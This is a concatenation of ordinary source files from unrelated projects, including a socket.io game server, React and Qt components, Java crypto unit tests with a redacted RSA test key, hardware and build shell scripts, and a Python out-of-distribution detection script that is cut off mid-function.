          io.emit(PLAYER_LEAVE, sessionToLeave);
          io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
          socket.emit(PLAYER_LEAVE, session); // TODO is this useful?
          socket.to(session.id).emit(PLAYER_LEAVE, session);
        } catch (err) {
          this.handleEventError(err, PLAYER_LEAVE);
        }
      });
      // Card state changed: persist the new cards, keep everything else.
      socket.on(CARDS_UPDATE, (update: CardsUpdateMessage) => {
        try {
          const id = update.sessionId;
          const currentSession = sessionsDB.read(id);
          sessionsDB.update(id, {
            id,
            name: currentSession.name,
            status: currentSession.status,
            sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
            senderPlayerIndex: update.senderPlayerIndex,
            senderPlayerNetworkId: update.senderPlayerNetworkId,
            players: currentSession.players,
            cards: update.cards,
          });
          io.emit(CARDS_UPDATE, update);
          socket.to(update.sessionId).emit(CARDS_UPDATE, update);
          io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
        } catch (err) {
          this.handleEventError(err, CARDS_UPDATE);
        }
      });
      // Player state changed: persist the new players, keep everything else.
      socket.on(PLAYERS_UPDATE, (update: PlayersUpdateMessage) => {
        try {
          // console.log('PLAYERS_UPDATE');
          // console.log(`SERVER: on PLAYERS_UPDATE =>\n${JSON.stringify(update, null, 2)}`);
          const id = update.sessionId;
          const currentSession = sessionsDB.read(id);
          // console.log(`CURRENT SESSION: ${JSON.stringify(currentSession, null)}`)
          sessionsDB.update(id, {
            id,
            name: currentSession.name,
            status: currentSession.status,
            sessionOwnerNetworkId: currentSession.sessionOwnerNetworkId,
            senderPlayerIndex: update.senderPlayerIndex,
            senderPlayerNetworkId: update.senderPlayerNetworkId,
            players: update.players,
            cards: currentSession.cards,
          });
          io.emit(PLAYERS_UPDATE, update);
          socket.to(id).emit(PLAYERS_UPDATE, update);
          io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
        } catch (err) {
          this.handleEventError(err, PLAYERS_UPDATE);
        }
      });
      // Session deletion — only allowed for the session owner.
      socket.on(GAME_SESSION_DELETE, (session: SessionDeleteMessage) => {
        try {
          // console.log(`SERVER: on GAME_SESSION_DELETE =>\n${JSON.stringify(session, null, 2)}`);
          safeJoin(session.id);
          const currentSession = sessionsDB.read(session.id);
          if (currentSession.sessionOwnerNetworkId === session.senderPlayerNetworkId) {
            sessionsDB.delete(session.id);
            socket.emit(GAME_SESSION_DELETE, session);
            socket.to(session.id).emit(GAME_SESSION_DELETE, session);
            io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
          } else {
            console.error(`SERVER: player with ID '${session.senderPlayerNetworkId}'` +
              ` is not allowed to delete session with ID '${session.id}'!`);
          }
        } catch (err) {
          this.handleEventError(err, GAME_SESSION_DELETE);
        }
      });
      // Push the current session list to the newly connected client.
      try {
        io.emit(GAME_SESSIONS_UPDATE, sessionsDB.readAll());
      } catch (err) {
        this.handleEventError(err, GAME_SESSIONS_UPDATE);
      }
    });
    // After websockets close, give in-flight traffic a moment, then close HTTP.
    io.on(CLOSE, () => {
      setTimeout(() => {
        console.log('SOCKET-SERVER: websockets closed!');
        this.httpServer.close((err?: Error) => {
          if (err) {
            console.error(`SERVER: closed HTTP server with error: ${err.stack}!`);
          } else {
            console.log('SERVER: HTTP server closed!');
          }
        });
      }, 500);
    });
  }
  /**
   * Starts game server.
   * @param port - The port the server starts on.
   */
  private start(port: number) {
    this.httpServer.listen(port);
    console.log(`SERVER: listening on http://${os.hostname()}:${port} ...`);
    try {
      // Best effort: also print the LAN IPv4 address of interface en0.
      const en0Ipv4 = os.networkInterfaces().en0.find((elem) => (elem.family === 'IPv4'));
      const ip = en0Ipv4 ? en0Ipv4.address : undefined;
      if (ip) {
        console.log(`SERVER: listening on http://${ip}:${port} ...`);
      }
    } catch (_) { } // Do not fail if we cannot detect!
  }
  /**
   * Stops game server gracefully.
   */
  public stop() {
    if (!this.stopping) { // Do not execute once it is called multiple times!
      this.stopping = true;
      console.log('SERVER: server is stopping gracefully...');
      console.log('SERVER: server is cleaning up...');
      console.log('SOCKET-SERVER: clearing session send interval...');
      clearInterval(this.timeout);
      console.log('SOCKET-SERVER: closing websockets...');
      this.io.close();
      console.log('SERVER: server has been stopped!');
    }
  }
}
|
"use strict";
import React from 'react';
// Root component that renders whatever the app's "response" service supplies,
// and re-renders when "app.response" / "app.reload" events fire.
// NOTE(review): `app(...)` is presumably a global service locator — confirm.
class Application extends React.Component {
    static displayName = "@Application";
    constructor() {
        super();
        const response = app("response");
        // Tracks whether setState is currently safe; when not, the pending
        // update is stashed in _mountedCallback and replayed after (re)mount.
        this._isMounted = false;
        this._mountedCallback = null;
        this._event = app("events");
        this.state = {
            children: response.send()
        };
        // Replace the rendered tree when a new response element arrives.
        this._responseEvent = this._event.addListener("app.response", ({ element }) => {
            if (this._isMounted) {
                return this.setState({
                    children: element
                });
            }
            this._mountedCallback = () => this.setState({
                children: element
            });
        });
        // Reload: clear children first, then re-request them, forcing a full remount.
        this._reloadEvent = this._event.addListener("app.reload", () => {
            if (this._isMounted) {
                return this.setState({
                    children: null
                }, () => {
                    this.setState({
                        children: response.send()
                    });
                });
            }
            this._mountedCallback = () => this.setState({
                children: null
            }, () => {
                this.setState({
                    children: response.send()
                });
            });
        });
    }
    getSnapshotBeforeUpdate() {
        this._event.emit("app.component.update");
        // Deliberately flags the component as "not mounted" during the update
        // window; componentDidUpdate sets it back to true afterwards.
        this._isMounted = false;
        return null;
    }
    shouldComponentUpdate(nextProps, nextState) {
        // Only re-render when the rendered element itself changes.
        return (
            this.state.children !== nextState.children
        );
    }
    render() {
        this._event.emit("app.component.render");
        return this.state.children;
    }
    componentDidMount() {
        this._isMounted = true;
        // Replay any state update that arrived while updates were unsafe.
        if( this._mountedCallback ) {
            this._mountedCallback();
        }
        this._event.emit("app.component.mounted");
    }
    componentDidUpdate() {
        this._isMounted = true;
        // Replay any state update that arrived while updates were unsafe.
        if (this._mountedCallback) {
            this._mountedCallback();
        }
        this._event.emit("app.component.updated");
    }
    componentWillUnmount() {
        // Detach listeners defensively (remove may be absent on some event impls).
        this._responseEvent
            && this._responseEvent.remove
            && this._responseEvent.remove()
        ;
        this._reloadEvent
            && this._reloadEvent.remove
            && this._reloadEvent.remove()
        ;
        this._event.emit("app.component.unmount");
    }
}
export default Application; |
#ifndef MMTIMER_H
#define MMTIMER_H
#include <windows.h>
#include <mmsystem.h>
#include <QObject>
// Timer backed by the Windows multimedia timer API (mmsystem), exposed to Qt
// code through a timeout() signal.
class MMTimer : public QObject
{
    Q_OBJECT
public:
    // The multimedia timer callback needs access to this object (passed via
    // the `user` pointer) to emit timeout().
    friend void WINAPI CALLBACK mmtimer_proc(uint, uint, DWORD_PTR user, DWORD_PTR, DWORD_PTR);

    // interval: timer period, presumably in milliseconds — TODO confirm against the .cpp
    explicit MMTimer(int interval, QObject *parent=nullptr);

signals:
    // Emitted on each timer tick.
    void timeout();

public slots:
    void start();
    void stop();

private:
    int interval;  // tick period
    int id;        // timer id, presumably returned when the timer is started — TODO confirm
};
#endif // MMTIMER_H
|
def search_list(head, val):
    """Return True if ``val`` occurs in the singly linked list starting at ``head``.

    Args:
        head: First node of the list (each node has ``data`` and ``next``),
            or None for an empty list.
        val: Value to search for, compared with ``==`` against ``node.data``.

    Returns:
        bool: True when some node's ``data`` equals ``val``, else False.
    """
    # Iterative walk instead of the original recursion: avoids hitting
    # Python's recursion limit (RecursionError) on long lists, with
    # identical results for every list the recursive version could handle.
    node = head
    while node is not None:
        if node.data == val:
            return True
        node = node.next
    return False
<reponame>NickGraeff/launchkey-java
package com.iovation.launchkey.sdk.crypto;
import org.apache.commons.codec.binary.Base64;
import org.bouncycastle.jce.provider.BouncyCastleProvider;
import org.bouncycastle.util.encoders.Hex;
import org.bouncycastle.util.io.pem.PemObject;
import org.bouncycastle.util.io.pem.PemReader;
import org.junit.After;
import org.junit.Before;
import org.junit.Test;
import java.io.StringReader;
import java.security.KeyFactory;
import java.security.interfaces.RSAPrivateKey;
import java.security.interfaces.RSAPublicKey;
import java.security.spec.PKCS8EncodedKeySpec;
import java.security.spec.X509EncodedKeySpec;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertNotNull;
/**
 * Tests for {@code JCECrypto}: RSA encrypt/decrypt round trips, PEM parsing
 * with different line endings, SHA digests, and key fingerprinting.
 */
public class JCECryptoTest {
    @SuppressWarnings("SpellCheckingInspection")
    private static final String PRIVATE_KEY =
            ("-----BEGIN RSA PRIVATE KEY-----\n" +
                    "<KEY>" +
                    "<KEY>" +
                    "<KEY>" +
                    "<KEY>" +
                    "<KEY>" +
                    "<KEY>WNAtMWt2egYAe6XOEXIWOiQIDAQABAoIBADUmDOzZ0DAI0WPS\n" +
                    "m7rywqk5dIRu5AgDn9EYfn3FsH1heO1GR/xEq8pWv7KM+zKpS6uFwbDdGqDaB9Bu\n" +
                    "OiNW08ZWloBN0tL+ROw0rzVD8uA8UXnEY8sl2EMHRKDd2x+SV5yMHXuLzqu9d1RS\n" +
                    "7/lRLojGacnMOuf/WEKmz2+sC73UDfYm7Kq39LStE0Hi9iAq8eF+9U8b3l7Pikx/\n" +
                    "t70wOfCQJCrlfAFn0MdoxXoybr4HCy7tA2pqWPG2yhGnROaJSA430UNJQ9sU9p5M\n" +
                    "<KEY>" +
                    "mcIhiNECgYEAxju+IzfDHis3GSu/6GALoDnxLpOi3y8QjBBa8nEd4XpRGAyaHgbt\n" +
                    "/Q03Sd9jfST0jP7hKyJPWiPR5l4M9BpCEuQlhxdpSdy0acvXhuwdAWawaOHkMcUV\n" +
                    "iBZfzOB0VY2L55RVpaAqO1rq0EOydsD3n9uX/eEjWiaEEZNhdzrcgkUCgYEA3Vva\n" +
                    "cW4wguSB7VWJDJCd+o69AS29tBQBqYtCXRokmzWU6hitNa36wJMI2/fTW2lxegAi\n" +
                    "8RJ8HRAj8D3GpwbdIm5tgH+2EBoGqraxwXfyt4NKiVvRFEyg0zLq31U9VDm11BlG\n" +
                    "KU6XdxzD5aC+/txML+ib85WQsVInKVdP5pXowXUCgYB2scT6f2QER2n5V1nUQNYV\n" +
                    "PTxtYBcQvbSRuSVLr3Ft1fiChuEtA4cyktw9DlYa06reVarrUeLjnTkMT9o/uw0/\n" +
                    "FH5n8huoD0+zXUuSzQPdF+ifFEq3hkOLNaJtISRnKZbQtd/GiS1gVuLsiuxr8MUU\n" +
                    "Yb8TU+AAFbnUcEPWyVbJZQKBgBPtjQDhNqTSBZBkPu5OpqpD52gPwiBQHMYyr0rK\n" +
                    "a7k9XaalihJnE0f69LU43mJAX+Ln2D1zuJC1P0cFiLjIuWe8IUeMN8vDTA5aXC5a\n" +
                    "qhMzUqaDCZOWQnRBBTwN5HOMrn3luJdHaANlJ42opwkys/ksK74GHPyZtMTYA21y\n" +
                    "2X1xAoGAW3Yu0n/VcvDcQZmE++iPDKLD/Mpc18G1sRLNwrdhVEgRVk8sfYiQxmOb\n" +
                    "NNHiXe4njK7waEKHPo86poV22FAum0zBMFSf9igfCk5kuL/pk4EVa58NftF69S8V\n" +
                    "Ud+Zy3E0RJXToW0t3Eo5UexVieglvpgxG7x1SCdvxYtTl6CZ520=\n" +
                    "-----END RSA PRIVATE KEY-----\n");

    // Same key with alternate line endings, to exercise the PEM reader.
    private static final String PRIVATE_KEY_CARRIAGE_RETURN = PRIVATE_KEY.replace('\n', '\r');
    private static final String PRIVATE_KEY_CARRIAGE_RETURN_NEWLINE = PRIVATE_KEY.replace("\n", "\r\n");

    @SuppressWarnings("SpellCheckingInspection")
    private static final String PUBLIC_KEY =
            "-----BEGIN PUBLIC KEY-----\n" +
                    "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq2izh7NEarDdrdZLrpli\n" +
                    "zezZG/JzW14XQ74IXkjEqkvxhZ1s6joGtvoxX+P0QRyWrhgtiUnN3DSRAa0QLsZ0\n" +
                    "<KEY>0/6eoJGwXSHcLreLEfqdd8+zlvDrbWISekTLoecLttwKSIcP2bcq1\n" +
                    "<KEY>fHrMOZNLKRYXx3Zx8zsQFf2ee/y\n" +
                    "<KEY>cOd+pO6hKxff6Q2GVXqHsrI\n" +
                    "ac4AlR80AEaBeiuFYxjHpruS6BRcyW8UvqX0l9rKMDAWNAtMWt2egYAe6XOEXIWO\n" +
                    "iQIDAQAB\n" +
                    "-----END PUBLIC KEY-----\n";

    private static final String PUBLIC_KEY_FINGERPRINT = "39:bc:93:66:34:af:e5:15:b4:a1:33:58:81:dc:68:2c";
    private static final String PUBLIC_KEY_CARRIAGE_RETURN = PUBLIC_KEY.replace('\n', '\r');
    private static final String PUBLIC_KEY_CARRIAGE_RETURN_NEWLINE = PUBLIC_KEY.replace("\n", "\r\n");

    private Base64 base64;
    private BouncyCastleProvider provider;
    private JCECrypto crypto;
    private RSAPublicKey rsaPublicKey;
    private RSAPrivateKey rsaPrivateKey;

    @Before
    public void setUp() throws Exception {
        base64 = new Base64(0);
        provider = new BouncyCastleProvider();
        KeyFactory keyFactory = KeyFactory.getInstance("RSA", provider);
        PemObject pem = new PemReader(new StringReader(PRIVATE_KEY)).readPemObject();
        rsaPrivateKey = (RSAPrivateKey) keyFactory.generatePrivate(new PKCS8EncodedKeySpec(pem.getContent()));
        pem = new PemReader(new StringReader(PUBLIC_KEY)).readPemObject();
        rsaPublicKey = (RSAPublicKey) keyFactory.generatePublic(new X509EncodedKeySpec(pem.getContent()));
        crypto = new JCECrypto(provider);
    }

    @After
    public void tearDown() throws Exception {
        base64 = null;
        provider = null;
        crypto = null;
        // Fix: a duplicate `rsaPublicKey = null;` assignment was removed here.
        rsaPublicKey = null;
        rsaPrivateKey = null;
    }

    @Test
    public void testDecryptRSA() throws Exception {
        String expected = "This is the expected unencrypted value";
        @SuppressWarnings("SpellCheckingInspection")
        String base64encodedEncrypted =
                "<KEY>" +
                        "<KEY>" +
                        "<KEY>" +
                        "<KEY>" +
                        "9Q6a1Yhav4vBvYouoXRfRwEsiwyZflXfXzgHqA==\n";
        String actual = new String(crypto.decryptRSA(base64.decode(base64encodedEncrypted), rsaPrivateKey));
        assertEquals(expected, actual);
    }

    @Test
    public void testEncryptRSA() throws Exception {
        String expected = "This is the expected unencrypted value";
        String actual =
                new String(crypto.decryptRSA(crypto.encryptRSA(expected.getBytes(), rsaPublicKey), rsaPrivateKey));
        assertEquals(expected, actual);
    }

    @Test
    public void testDecryptAuthTypeDataWithNewLines() throws Exception {
        String expected = "{\"auth_request\": \"AuthRequest\", \"action\": \"True\"," +
                " \"app_Pins\": \"\", \"device_id\": \"DeviceId\"}";
        @SuppressWarnings("SpellCheckingInspection")
        String base64encodedEncrypted =
                "<KEY>" +
                        "<KEY>" +
                        "<KEY>" +
                        "<KEY>" +
                        "kTXLdICAqZOuCqYZcU4xdr9Wy/R2tWKOlPm9rw==\n";
        String actual = new String(crypto.decryptRSA(base64.decode(base64encodedEncrypted), rsaPrivateKey));
        assertEquals(expected, actual);
    }

    @Test
    public void testGetRSAPublicKeyFromPEM() throws Exception {
        RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY);
        assertNotNull(actual);
    }

    @Test
    public void testGetRSAPublicKeyFromPEMCarriageReturn() throws Exception {
        RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY_CARRIAGE_RETURN);
        assertNotNull(actual);
    }

    @Test
    public void testGetRSAPublicKeyFromPEMCarriageReturnNewline() throws Exception {
        RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY_CARRIAGE_RETURN_NEWLINE);
        assertNotNull(actual);
    }

    @Test
    public void testGetRSAPrivateKeyFromPEM() throws Exception {
        RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY);
        assertNotNull(actual);
    }

    @Test
    public void testGetRSAPrivateKeyFromPEMCarriageReturn() throws Exception {
        RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY_CARRIAGE_RETURN);
        assertNotNull(actual);
    }

    @Test
    public void testGetRSAPrivateKeyFromPEMCarriageReturnNewline() throws Exception {
        RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY_CARRIAGE_RETURN_NEWLINE);
        assertNotNull(actual);
    }

    @Test
    public void testSha256() throws Exception {
        //noinspection SpellCheckingInspection
        String expected = "e806a291cfc3e61f83b98d344ee57e3e8933cccece4fb45e1481f1f560e70eb1";
        String actual = Hex.toHexString(crypto.sha256("Testing".getBytes()));
        assertEquals(expected, actual);
    }

    @Test
    public void testSha384() throws Exception {
        //noinspection SpellCheckingInspection
        String expected = "2ca8b7b913d970a884fdb61daf74f6b4f868bc2ac20ea75" +
                "83009259f382b14a04be97ea64ba0bab703ca7ea75a932bd5";
        String actual = Hex.toHexString(crypto.sha384("Testing".getBytes()));
        assertEquals(expected, actual);
    }

    @Test
    public void testSha512() throws Exception {
        //noinspection SpellCheckingInspection
        String expected = "64f02697ccd1c0ae741d9e226f957127da7a614d6a18f55f9f2726d2027faac1" +
                "e95e619dac5417eb4898fd6a9fb8aeb9cdd005e913c80e57454cae4b6fc6e5d6";
        String actual = Hex.toHexString(crypto.sha512("Testing".getBytes()));
        assertEquals(expected, actual);
    }

    @Test
    public void testGetRsaPublicKeyFingerprintWithPrivateKeyReturnsProperFingerprint() throws Exception {
        assertEquals(PUBLIC_KEY_FINGERPRINT, crypto.getRsaPublicKeyFingerprint(rsaPrivateKey));
    }

    @Test
    public void testGetRsaPublicKeyFingerprintWithPublicKeyReturnsProperFingerprint() throws Exception {
        assertEquals(PUBLIC_KEY_FINGERPRINT, crypto.getRsaPublicKeyFingerprint(rsaPublicKey));
    }

    @Test
    public void testGetPEMFromPublicKey() throws Exception {
        assertEquals(PUBLIC_KEY,
                JCECrypto.getPEMFromRSAPublicKey(JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY)));
    }

    @Test
    public void testGetPEMFromPubicKey1024Key() throws Exception {
        //noinspection SpellCheckingInspection
        final String pem = "-----BEGIN PUBLIC KEY-----\n" +
                "<KEY>" +
                "sN9nM11H1ajurrZz4ZKCKPG1jdmqvo/tGXvt5mQyvR9WJCg6+uokSfMCAwEAAQ==\n" +
                "-----END PUBLIC KEY-----\n";
        assertEquals(pem,
                JCECrypto.getPEMFromRSAPublicKey(JCECrypto.getRSAPublicKeyFromPEM(provider, pem)));
    }
}
|
#!/bin/bash
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Command for unit test
# Echoes its own name and arguments, normalising any /tmp/test_fw.XXXXXX
# temp-dir path to the literal "temp_dir" so test output is deterministic.
echo $(basename $0) "$@" | sed "s#/tmp/test_fw\..\{6\}#temp_dir#g"
|
<reponame>philly-d/kustomer-bank-challenge<gh_stars>0
import React from 'react';
import { normalizeAmount } from '../reducers/transactions';
// App header (shows user balance)
const Header = ({ balance }) => {
return (
<div className="content-block">
<div classNamze="column">
<h2 className="ui center aligned header">
Welcome to Banker's Bank!
</h2>
<div className="ui statistic">
<div className="value">
${ normalizeAmount(balance) }
</div>
<div className="label">Your Balance</div>
</div>
</div>
</div>
)
}
export default Header; |
#!/bin/bash
##
## Copyright 2019 International Business Machines
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
verbose=0
snap_card=0
duration="NORMAL"
# Get path of this script
THIS_DIR=$(dirname $(readlink -f "$BASH_SOURCE"))
ACTION_ROOT=$(dirname ${THIS_DIR})
SNAP_ROOT=$(dirname $(dirname ${ACTION_ROOT}))
echo "Starting : $0"
echo "SNAP_ROOT : ${SNAP_ROOT}"
echo "ACTION_ROOT : ${ACTION_ROOT}"
# Print command-line help for hw_test.sh.
function usage() {
    printf '%s\n' \
        "Usage:" \
        " hw_test.sh" \
        " [-C <card>] card to be used for the test"
    # Options parsed by getopts but not (yet) advertised:
    # echo " [-t <trace_level>]"
    # echo " [-duration SHORT/NORMAL/LONG] run tests"
    echo
}
# Parse command-line options; an unknown option only warns so the test can
# still proceed with the defaults set above.
while getopts ":C:t:d:h" opt; do
    case $opt in
    C)
    # Card index passed to snap_helloworld via -C.
    snap_card=$OPTARG;
    ;;
    t)
    # Exported so child processes (snap tools) pick the trace level up.
    export SNAP_TRACE=$OPTARG;
    ;;
    d)
    duration=$OPTARG;
    ;;
    h)
    usage;
    exit 0;
    ;;
    \?)
    echo "Invalid option: -$OPTARG" >&2
    ;;
    esac
done
export PATH=$PATH:${SNAP_ROOT}/software/tools:${ACTION_ROOT}/sw
####iHELLOWORLD ##########################################################
# Run snap_helloworld on card ${snap_card}: reads ./tin, writes ./tout, then
# compares tout against the expected all-caps reference file tCAP.
# Exits the whole script with status 1 on any failure.
function test_helloworld {
  # The commented commands below once generated the tin/tCAP fixtures; the
  # test currently assumes those files already exist.
  #cmd="echo \"Hello world. This is my first CAPI SNAP experience. It's real fun.\" > tin"
  #echo "cmd: ${cmd}"
  #eval ${cmd}
  #cmd="echo \"HELLO WORLD. THIS IS MY FIRST CAPI SNAP EXPERIENCE. IT'S REAL FUN.\" > tCAP"
  #echo "cmd: ${cmd}"
  #eval ${cmd}
  echo -n "Doing snap_helloworld "
  cmd="snap_helloworld -C${snap_card} -i tin -o tout >> snap_helloworld.log 2>&1"
  eval ${cmd}
  if [ $? -ne 0 ]; then
    cat snap_helloworld.log
    echo "cmd: ${cmd}"
    echo "failed"
    exit 1
  fi
  echo "ok"

  echo -n "Check results ... "
  # Fixed redirection order: "> /dev/null 2>&1" silences both streams; the
  # original "2>&1 > /dev/null" still let cmp's stderr through.
  cmp tout tCAP > /dev/null 2>&1
  if [ $? -ne 0 ]; then
    echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    echo " TEST FAILED !"
    echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    echo " Out and expected files are different!"
    echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    exit 1
  fi
  echo "ok"
}
# Start from a clean, existing log file so the appends above always work.
rm -f snap_helloworld.log
touch snap_helloworld.log

# Whatever duration is, we run the test
# duration is used to run short test in simulation for example
# helloworld is short by nature, so we can ignore duration setting
test_helloworld

# Clean up test artifacts. Fixed: "*.bin" was listed twice.
rm -f *.bin *.out
echo "------------------------------------------------------"
echo "Test OK"
echo "------------------------------------------------------"
exit 0
|
#!/bin/sh
# This is a generated file; do not edit or check into version control.
# NOTE(review): generated on Windows for an iOS build — the backslash paths
# and the mixed separators in SYMROOT come from the generator; regenerate
# with the Flutter tool rather than hand-editing.
export "FLUTTER_ROOT=C:\src\flutter\1.17.4"
export "FLUTTER_APPLICATION_PATH=C:\Users\shafi\AndroidStudioProjects\B2GSoft\Flutter\quick_rider"
export "FLUTTER_TARGET=lib\main.dart"
export "FLUTTER_BUILD_DIR=build"
export "SYMROOT=${SOURCE_ROOT}/../build\ios"
export "OTHER_LDFLAGS=$(inherited) -framework Flutter"
export "FLUTTER_FRAMEWORK_DIR=C:\src\flutter\1.17.4\bin\cache\artifacts\engine\ios"
export "FLUTTER_BUILD_NAME=1.0.0"
export "FLUTTER_BUILD_NUMBER=1"
|
/*
* Copyright OpenSearch Contributors
* SPDX-License-Identifier: Apache-2.0
*/
package com.amazon.dataprepper.plugins.processor.aggregate;
/**
 * Holds the {@link GroupState} for a single aggregation group, exposing it
 * through the {@code AggregateActionInput} contract.
 */
class AggregateGroup implements AggregateActionInput {
    /** State shared by all events in this group; starts out as the default (empty) state. */
    private final GroupState groupState = new DefaultGroupState();

    public GroupState getGroupState() {
        return groupState;
    }
}
|
import requests
import time
# Base URL every endpoint path is appended to.
API_URL = 'https://example.com/api/'

class HTTPClient:
    """Thin wrapper around requests.Session that retries failed GETs forever.

    Attributes:
        s: the underlying requests.Session (reused for connection pooling).
        last_response: most recent successful (HTTP 200) response, else unchanged.
    """

    def __init__(self):
        self.s = requests.Session()
        self.last_response = None

    def send_request(self, endpoint, verify=True):
        """GET API_URL + endpoint, retrying every 60s on any transport error.

        The endless retry is deliberate best-effort behaviour: network blips
        should not kill the caller. Only a 200 response updates
        self.last_response.

        Args:
            endpoint: path appended to API_URL.
            verify: TLS certificate verification flag forwarded to requests.
        """
        while True:
            try:
                # Passing verify explicitly is equivalent to the library
                # default when True, so one call covers both original branches.
                response = self.s.get(API_URL + endpoint, verify=verify)
                break
            except Exception as e:
                print('Except on send_request (wait 60 sec and resend): ' + str(e))
                time.sleep(60)
        if response.status_code == 200:
            self.last_response = response
//
// TTAudioTool.h
// TT
//
// Created by 张福润 on 2017/4/6.
// Copyright © 2017年 张福润. All rights reserved.
//
#import <Foundation/Foundation.h>
// Completion callback for playback operations; success reports the outcome
// and msg carries an accompanying message. ("Complition" spelling kept —
// renaming the public type would break existing callers.)
typedef void(^ComplitionBlock)(BOOL success, NSString *msg);
// Delegate receiving playback progress and completion callbacks.
@protocol TTAudioToolDelegate <NSObject>
@optional
// Called as playback advances. NOTE(review): progress is presumably in the
// 0.0–1.0 range — confirm in the implementation.
- (void)audioToolProgress:(float)progress currentTime:(NSTimeInterval)currentTime;
// Called when playback finishes. ("Competed" spelling kept for API compatibility.)
- (void)audioToolPlayCompeted;
@end
// Singleton audio playback helper.
@interface TTAudioTool : NSObject
// weak to avoid a retain cycle with the delegate owner.
@property (nonatomic, weak) id<TTAudioToolDelegate> delegate;
// URL of the audio to play.
@property (nonatomic, strong) NSURL *audioPath;
@property (nonatomic, assign, readonly) float progress;
@property (nonatomic, assign, readonly) NSTimeInterval currentTime;
@property (nonatomic, assign, readonly) NSTimeInterval totalTime;
// Shared singleton instance.
+ (instancetype)shareInstance;
- (void)play;
- (void)playWithBlock:(ComplitionBlock)complition;
// Start playback at the given offset (seconds).
- (void)playWithTime:(NSTimeInterval)time;
- (void)pause;
- (void)stop;
@end
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
"""
Created on Sat Sep 19 20:55:56 2015
@author: liangshiyu
"""
from __future__ import print_function
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import numpy as np
import time
from scipy import misc
import calMetric as m
import calData as d
#CUDA_DEVICE = 0
start = time.time()  # wall-clock start used for overall timing
#loading data sets
# Per-channel CIFAR mean/std expressed on the 0-1 scale (raw 0-255 values
# divided by 255).
transform = transforms.Compose([
    transforms.ToTensor(),
    transforms.Normalize((125.3/255, 123.0/255, 113.9/255), (63.0/255, 62.1/255.0, 66.7/255.0)),
])
# loading neural network
# Name of neural networks
# Densenet trained on CIFAR-10: densenet10
# Densenet trained on CIFAR-100: densenet100
# Densenet trained on WideResNet-10: wideresnet10
# Densenet trained on WideResNet-100: wideresnet100
#nnName = "densenet10"
#imName = "Imagenet"
# Loss used by the ODIN perturbation step in calData.
criterion = nn.CrossEntropyLoss()
def recursion_change_bn(module):
    """Recursively set track_running_stats=1 on every BatchNorm2d in `module`.

    Needed to load checkpoints saved before torchvision introduced the
    track_running_stats attribute. Mutates the module in place and returns it.
    """
    if isinstance(module, torch.nn.BatchNorm2d):
        module.track_running_stats = 1
    else:
        for child in module._modules.values():
            recursion_change_bn(child)
    return module
def test(nnName, dataName, CUDA_DEVICE, epsilon, temperature):
    """Run the out-of-distribution evaluation for one model/dataset pair.

    nnName: checkpoint name under ../models (densenet10/100, wideresnet10/100).
    dataName: OOD image folder under ../data, or "Uniform"/"Gaussian" for
        synthetic noise generated by calData.
    CUDA_DEVICE: GPU index the model is moved to.
    epsilon, temperature: perturbation magnitude and softmax temperature
        forwarded to calData.
    """
    net1 = torch.load("../models/{}.pth".format(nnName))
    # Patch BatchNorm layers from old checkpoints (see recursion_change_bn).
    for i, (name, module) in enumerate(net1._modules.items()):
        module = recursion_change_bn(module)
    # lr=0, momentum=0: the optimizer exists only because calData requires
    # one; it never updates the weights.
    optimizer1 = optim.SGD(net1.parameters(), lr = 0, momentum = 0)
    net1.cuda(CUDA_DEVICE)
    # Real OOD data comes from disk; synthetic noise needs no loader.
    if dataName != "Uniform" and dataName != "Gaussian":
        testsetout = torchvision.datasets.ImageFolder("../data/{}".format(dataName), transform=transform)
        testloaderOut = torch.utils.data.DataLoader(testsetout, batch_size=1,
                                         shuffle=False, num_workers=2)
    # In-distribution set matches the training data of the chosen model.
    # NOTE(review): an unrecognized nnName leaves testloaderIn undefined and
    # raises NameError below — confirm callers only pass the four known names.
    if nnName == "densenet10" or nnName == "wideresnet10":
        testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)
        testloaderIn = torch.utils.data.DataLoader(testset, batch_size=1,
                                         shuffle=False, num_workers=2)
    if nnName == "densenet100" or nnName == "wideresnet100":
        testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=True, transform=transform)
        testloaderIn = torch.utils.data.DataLoader(testset, batch_size=1,
                                         shuffle=False, num_workers=2)
    if dataName == "Gaussian":
        d.testGaussian(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderIn, nnName, dataName, epsilon, temperature)
        m.metric(nnName, dataName)
